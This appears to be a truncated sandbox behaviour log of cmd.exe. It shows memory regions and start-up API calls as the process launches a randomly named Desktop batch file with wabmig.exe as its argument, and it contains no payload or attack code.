region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8954 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 8955 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8956 start_va = 0x7e1f0000 end_va = 0x7e212fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e1f0000" filename = "" Region: id = 8957 start_va = 0x7e214000 end_va = 0x7e214fff entry_point = 0x0 region_type = private name = "private_0x000000007e214000" filename = "" Region: id = 8958 start_va = 0x7e217000 end_va = 0x7e217fff entry_point = 0x0 region_type = private name = "private_0x000000007e217000" filename = "" Region: id = 8959 start_va = 0x7e21d000 end_va = 0x7e21ffff entry_point = 0x0 region_type = private name = "private_0x000000007e21d000" filename = "" Region: id = 8960 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8961 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8962 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8963 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8964 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8965 start_va = 0x870000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000870000" filename = "" Region: id = 8966 start_va = 0x880000 end_va = 0x881fff entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 8977 start_va = 0xa10000 end_va = 0xa1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 8978 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8979 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8980 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8981 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8982 start_va = 0xa20000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000a20000" filename = "" Region: id = 8983 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8984 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8985 start_va = 0x6d0000 end_va = 0x6dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 8986 start_va = 0x7e0f0000 end_va = 0x7e1effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e0f0000" filename = "" Region: id = 9105 start_va = 0x890000 end_va = 0x94dfff entry_point = 0x890000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9106 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 9107 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 9108 start_va = 0xc00000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 9109 start_va = 0xd00000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 9110 start_va = 0x7e21a000 end_va = 0x7e21cfff entry_point = 0x0 region_type = private name = "private_0x000000007e21a000" filename = "" Region: id = 9111 start_va = 0x6e0000 end_va = 0x6e3fff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 9281 start_va = 0x6f0000 end_va = 0x6f3fff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 9292 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 9293 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 9294 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 9295 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 9296 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 9297 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 9298 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 9299 start_va = 0x990000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 9328 start_va = 0xe50000 end_va = 0x1186fff entry_point = 0xe50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 951 os_tid = 0x304 [0290.636] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0290.637] __set_app_type (_Type=0x1) [0290.637] __p__fmode () returned 0x77984d6c [0290.637] __p__commode () returned 0x77985b1c [0290.637] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0290.637] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0290.637] GetCurrentThreadId () returned 0x304 [0290.638] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x304) returned 0x84 [0290.638] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0290.638] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0290.638] SetThreadUILanguage (LangId=0x0) returned 0x409 [0290.655] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0290.655] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x85fe00 | out: phkResult=0x85fe00*=0x0) returned 0x2 [0290.655] VirtualQuery (in: lpAddress=0x85fe07, lpBuffer=0x85fdb8, dwLength=0x1c | out: lpBuffer=0x85fdb8*(BaseAddress=0x85f000, AllocationBase=0x760000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0290.655] VirtualQuery (in: lpAddress=0x760000, lpBuffer=0x85fdb8, dwLength=0x1c | out: lpBuffer=0x85fdb8*(BaseAddress=0x760000, AllocationBase=0x760000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0290.655] VirtualQuery (in: lpAddress=0x761000, lpBuffer=0x85fdb8, dwLength=0x1c | out: lpBuffer=0x85fdb8*(BaseAddress=0x761000, AllocationBase=0x760000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0290.655] VirtualQuery (in: lpAddress=0x763000, lpBuffer=0x85fdb8, dwLength=0x1c | out: lpBuffer=0x85fdb8*(BaseAddress=0x763000, AllocationBase=0x760000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0290.656] VirtualQuery (in: lpAddress=0x860000, lpBuffer=0x85fdb8, dwLength=0x1c | out: lpBuffer=0x85fdb8*(BaseAddress=0x860000, AllocationBase=0x860000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0290.656] GetConsoleOutputCP () returned 0x1b5 [0290.746] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0290.746] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0290.746] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.746] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0290.931] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.931] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0290.956] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.956] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0291.268] _get_osfhandle (_FileHandle=0) returned 0x38 [0291.268] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0291.373] _get_osfhandle (_FileHandle=0) returned 0x38 [0291.373] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0291.793] GetEnvironmentStringsW () returned 0xb07e80* [0291.793] FreeEnvironmentStringsA (penv="A") returned 1 [0291.793] GetEnvironmentStringsW () returned 0xb07e80* [0291.793] FreeEnvironmentStringsA (penv="A") returned 1 [0291.793] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x85ed64 | out: phkResult=0x85ed64*=0x94) returned 0x0 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x0, lpData=0x85ed70*=0xd0, lpcbData=0x85ed6c*=0x1000) returned 0x2 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x4, lpData=0x85ed70*=0x1, lpcbData=0x85ed6c*=0x4) returned 0x0 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x0, lpData=0x85ed70*=0x1, lpcbData=0x85ed6c*=0x1000) returned 0x2 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x4, lpData=0x85ed70*=0x0, lpcbData=0x85ed6c*=0x4) returned 0x0 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x4, lpData=0x85ed70*=0x40, lpcbData=0x85ed6c*=0x4) returned 0x0 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x4, lpData=0x85ed70*=0x40, lpcbData=0x85ed6c*=0x4) returned 0x0 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x0, lpData=0x85ed70*=0x40, lpcbData=0x85ed6c*=0x1000) returned 0x2 [0291.794] RegCloseKey (hKey=0x94) returned 0x0 [0291.794] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x85ed64 | out: phkResult=0x85ed64*=0x94) returned 0x0 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x0, lpData=0x85ed70*=0x40, lpcbData=0x85ed6c*=0x1000) returned 0x2 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x4, lpData=0x85ed70*=0x1, lpcbData=0x85ed6c*=0x4) returned 0x0 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x0, lpData=0x85ed70*=0x1, lpcbData=0x85ed6c*=0x1000) returned 0x2 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x4, lpData=0x85ed70*=0x0, lpcbData=0x85ed6c*=0x4) returned 0x0 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x4, lpData=0x85ed70*=0x9, lpcbData=0x85ed6c*=0x4) returned 0x0 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x4, lpData=0x85ed70*=0x9, lpcbData=0x85ed6c*=0x4) returned 0x0 [0291.794] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x85ed68, lpData=0x85ed70, lpcbData=0x85ed6c*=0x1000 | out: lpType=0x85ed68*=0x0, lpData=0x85ed70*=0x9, lpcbData=0x85ed6c*=0x1000) returned 0x2 [0291.794] RegCloseKey (hKey=0x94) returned 0x0 [0291.794] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432ac [0291.794] srand (_Seed=0x5bb432ac) [0291.794] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Mail\\wabmig.exe\"\"" [0291.794] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Mail\\wabmig.exe\"\"" [0291.794] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0291.795] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb09dd8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0291.795] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0291.795] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0291.795] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0291.795] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0291.795] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0291.795] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0291.795] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0291.795] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0291.795] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0291.795] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0291.795] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0291.795] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0291.795] GetEnvironmentStringsW () returned 0xb07e80* [0291.795] FreeEnvironmentStringsA (penv="A") returned 1 [0291.795] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0291.795] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0291.795] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0291.795] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0291.796] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0291.796] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0291.796] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0291.796] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0291.796] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0291.796] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0291.796] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x85fb3c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0291.796] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x85fb3c, lpFilePart=0x85fb34 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x85fb34*="Desktop") returned 0x1d [0291.796] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0291.796] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x85f8b8 | out: lpFindFileData=0x85f8b8) returned 0xb005c8 [0291.796] FindClose (in: hFindFile=0xb005c8 | out: hFindFile=0xb005c8) returned 1 [0291.796] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x85f8b8 | out: lpFindFileData=0x85f8b8) returned 0xb005c8 [0291.796] FindClose (in: hFindFile=0xb005c8 | out: hFindFile=0xb005c8) returned 1 [0291.796] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0291.796] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x85f8b8 | out: lpFindFileData=0x85f8b8) returned 0xb005c8 [0291.796] FindClose (in: hFindFile=0xb005c8 | out: hFindFile=0xb005c8) returned 1 [0291.797] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0291.797] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0291.797] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0291.797] GetEnvironmentStringsW () returned 0xb07e80* [0291.797] FreeEnvironmentStringsA (penv="=") returned 1 [0291.797] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0291.798] GetConsoleOutputCP () returned 0x1b5 [0291.970] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0291.970] GetUserDefaultLCID () returned 0x409 [0291.970] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0291.970] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x85fc6c, cchData=128 | out: lpLCData="0") returned 2 [0291.970] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x85fc6c, cchData=128 | out: lpLCData="0") returned 2 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x85fc6c, cchData=128 | out: lpLCData="1") returned 2 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0291.971] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0291.971] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0291.972] GetConsoleTitleW (in: lpConsoleTitle=0xb0ab80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0292.298] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0292.298] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0292.299] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0292.299] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0292.299] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0292.300] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0292.300] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0292.300] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0292.300] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0292.300] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0292.300] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0292.301] GetConsoleTitleW (in: lpConsoleTitle=0x85f958, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0292.301] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0292.301] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0292.301] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0292.301] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0292.301] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0292.301] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0292.301] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0292.301] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0292.301] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0292.301] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0292.301] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0292.301] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0292.301] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0292.301] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0292.301] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0292.301] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0292.301] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0292.301] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0292.301] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0292.301] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0292.302] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0292.302] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0292.302] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0292.302] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0292.302] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0292.302] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0292.302] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0292.302] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0292.302] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0292.302] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0292.302] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0292.302] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0292.302] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0292.302] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0292.302] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0292.302] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0292.302] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0292.302] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0292.302] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0292.302] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0292.302] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0292.302] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0292.302] _wcsicmp 